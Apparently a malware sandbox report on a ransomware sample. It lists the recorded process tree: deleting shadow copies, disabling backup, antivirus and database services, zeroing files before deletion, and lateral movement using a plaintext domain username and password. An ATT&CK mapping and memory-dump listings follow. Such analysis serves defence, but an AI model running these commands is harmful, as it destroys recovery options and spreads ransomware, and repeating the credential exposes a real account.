- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6264
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6256
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:6248
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6240
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6232
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6220
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:6208
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:6200
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:6192
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:6180
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:6172
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:6164
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:6156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:6148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:6140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:5948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:6104
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5636
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.92 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:6080
- C:\Users\Admin\AppData\Local\Temp\2kx1y5bm.exe
  "C:\Users\Admin\AppData\Local\Temp\2kx1y5bm.exe" \10.10.0.92 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
  2⤵
  - Executes dropped EXE
  PID:5864
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5708
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6920
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:7096
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:4884
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5484
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\thanos-cleaned.exe
  2⤵
  PID:6468
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4268
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:7140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:5940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:6128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:4692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
- Suspicious use of WriteProcessMemory
PID:4460
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop BMR Boot Service /y
  2⤵
  PID:5316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:3984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:6616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:5908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:7052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:7044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:6216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:3648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:6040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:6032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:5524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:5308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:5148

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/756-2-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/756-3-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/756-7-0x00000000011B0000-0x00000000011B2000-memory.dmp

Filesize
8KB

Download
memory/796-30-0x000001BFFC2E0000-0x000001BFFC2E2000-memory.dmp

Filesize
8KB

Download
memory/796-18-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/796-70-0x000001BFFC2E8000-0x000001BFFC2E9000-memory.dmp

Filesize
4KB

Download
memory/796-32-0x000001BFFC2E3000-0x000001BFFC2E5000-memory.dmp

Filesize
8KB

Download
memory/796-60-0x000001BFFC2E6000-0x000001BFFC2E8000-memory.dmp

Filesize
8KB

Download
memory/820-151-0x000002DD26CE8000-0x000002DD26CE9000-memory.dmp

Filesize
4KB

Download
memory/820-24-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/820-68-0x000002DD26CE6000-0x000002DD26CE8000-memory.dmp

Filesize
8KB

Download
memory/820-44-0x000002DD26CE3000-0x000002DD26CE5000-memory.dmp

Filesize
8KB

Download
memory/820-43-0x000002DD26CE0000-0x000002DD26CE2000-memory.dmp

Filesize
8KB

Download
memory/1056-29-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/1056-33-0x0000023B3B260000-0x0000023B3B262000-memory.dmp

Filesize
8KB

Download
memory/1056-157-0x0000023B3B268000-0x0000023B3B269000-memory.dmp

Filesize
4KB

Download
memory/1056-34-0x0000023B3B263000-0x0000023B3B265000-memory.dmp

Filesize
8KB

Download
memory/1056-80-0x0000023B3B266000-0x0000023B3B268000-memory.dmp

Filesize
8KB

Download
memory/1196-6-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/1196-8-0x000001FAFDE60000-0x000001FAFDE62000-memory.dmp

Filesize
8KB

Download
memory/1196-9-0x000001FAFDE63000-0x000001FAFDE65000-memory.dmp

Filesize
8KB

Download
memory/1196-10-0x000001FA80A70000-0x000001FA80A71000-memory.dmp

Filesize
4KB

Download
memory/1196-11-0x000001FA80C20000-0x000001FA80C21000-memory.dmp

Filesize
4KB

Download
memory/1196-12-0x000001FAFDE66000-0x000001FAFDE68000-memory.dmp

Filesize
8KB

Download
memory/2136-67-0x000001CA65C96000-0x000001CA65C98000-memory.dmp

Filesize
8KB

Download
memory/2136-36-0x000001CA65C93000-0x000001CA65C95000-memory.dmp

Filesize
8KB

Download
memory/2136-153-0x000001CA65C98000-0x000001CA65C99000-memory.dmp

Filesize
4KB

Download
memory/2136-20-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/2136-35-0x000001CA65C90000-0x000001CA65C92000-memory.dmp

Filesize
8KB

Download
memory/2296-38-0x0000010FA5C73000-0x0000010FA5C75000-memory.dmp

Filesize
8KB

Download
memory/2296-21-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/2296-37-0x0000010FA5C70000-0x0000010FA5C72000-memory.dmp

Filesize
8KB

Download
memory/2296-154-0x0000010FA5C78000-0x0000010FA5C79000-memory.dmp

Filesize
4KB

Download
memory/2296-69-0x0000010FA5C76000-0x0000010FA5C78000-memory.dmp

Filesize
8KB

Download
memory/3104-31-0x0000021DF92C3000-0x0000021DF92C5000-memory.dmp

Filesize
8KB

Download
memory/3104-27-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/3104-158-0x0000021DF92C8000-0x0000021DF92C9000-memory.dmp

Filesize
4KB

Download
memory/3104-45-0x0000021DF92C0000-0x0000021DF92C2000-memory.dmp

Filesize
8KB

Download
memory/3104-78-0x0000021DF92C6000-0x0000021DF92C8000-memory.dmp

Filesize
8KB

Download
memory/3980-39-0x0000018039CA0000-0x0000018039CA2000-memory.dmp

Filesize
8KB

Download
memory/3980-23-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/3980-66-0x0000018039CA6000-0x0000018039CA8000-memory.dmp

Filesize
8KB

Download
memory/3980-42-0x0000018039CA3000-0x0000018039CA5000-memory.dmp

Filesize
8KB

Download
memory/3980-77-0x0000018039CA8000-0x0000018039CA9000-memory.dmp

Filesize
4KB

Download
memory/4168-159-0x0000018E3C768000-0x0000018E3C769000-memory.dmp

Filesize
4KB

Download
memory/4168-56-0x0000018E3C763000-0x0000018E3C765000-memory.dmp

Filesize
8KB

Download
memory/4168-98-0x0000018E3C766000-0x0000018E3C768000-memory.dmp

Filesize
8KB

Download
memory/4168-40-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/4168-55-0x0000018E3C760000-0x0000018E3C762000-memory.dmp

Filesize
8KB

Download
memory/4348-112-0x0000027CEF946000-0x0000027CEF948000-memory.dmp

Filesize
8KB

Download
memory/4348-59-0x0000027CEF943000-0x0000027CEF945000-memory.dmp

Filesize
8KB

Download
memory/4348-48-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/4348-160-0x0000027CEF948000-0x0000027CEF949000-memory.dmp

Filesize
4KB

Download
memory/4348-58-0x0000027CEF940000-0x0000027CEF942000-memory.dmp

Filesize
8KB

Download
memory/4992-149-0x0000024A900D6000-0x0000024A900D8000-memory.dmp

Filesize
8KB

Download
memory/4992-82-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/4992-163-0x0000024A900D8000-0x0000024A900D9000-memory.dmp

Filesize
4KB

Download
memory/4992-93-0x0000024A900D0000-0x0000024A900D2000-memory.dmp

Filesize
8KB

Download
memory/4992-95-0x0000024A900D3000-0x0000024A900D5000-memory.dmp

Filesize
8KB

Download
memory/5044-150-0x0000025DBD3C6000-0x0000025DBD3C8000-memory.dmp

Filesize
8KB

Download
memory/5044-88-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/5044-110-0x0000025DBD3C3000-0x0000025DBD3C5000-memory.dmp

Filesize
8KB

Download
memory/5044-107-0x0000025DBD3C0000-0x0000025DBD3C2000-memory.dmp

Filesize
8KB

Download
memory/5044-161-0x0000025DBD3C8000-0x0000025DBD3C9000-memory.dmp

Filesize
4KB

Download
memory/5104-91-0x00007FFFD26D0000-0x00007FFFD30BC000-memory.dmp

Filesize
9.9MB

Download
memory/5104-162-0x0000026169028000-0x0000026169029000-memory.dmp

Filesize
4KB

Download
memory/5104-101-0x0000026169020000-0x0000026169022000-memory.dmp

Filesize
8KB

Download
memory/5104-152-0x0000026169026000-0x0000026169028000-memory.dmp

Filesize
8KB

Download
memory/5104-103-0x0000026169023000-0x0000026169025000-memory.dmp

Filesize
8KB

Download